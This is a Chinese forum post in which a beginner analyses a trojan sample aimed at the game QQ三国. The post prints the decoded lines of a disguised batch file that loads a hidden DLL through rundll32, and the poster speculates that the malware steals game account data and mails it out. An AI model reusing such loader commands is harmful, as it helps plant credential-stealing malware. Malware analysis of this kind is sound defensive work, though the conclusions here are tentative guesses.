一个QQ三国的病毒样本分析
本帖最后由 Passerby 于 2014-10-19 19:05 编辑然后在右键编辑png.bat发现里面都是乱码 小菜只能百度解密bat工具
把里面的乱码整理了一下得到一下命令:
author:pengfei@www.cn-dos.net
%%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a
cls
mkdir "%appdata%"
rundll32.exe tenbook.dll,tencent
感觉想是加载rundll32.exe 在加载tenbook.dll
把隐藏的dll拖进OD看了一下发现几个函数具体不知作用
最后在运行那个图片文件.bmp
然后感觉像是劫持QQ三国 把QQ三国自动结束了 然后把劫持下来的信息发送到pengfei@www.cn-dos.net
小菜第一次分析木马 望大牛指出我的错误,另把样本打包 给大牛参照
期待你更精彩的分析{:301_993:} 哈哈哈哈哈 楼主把气
页:
[1]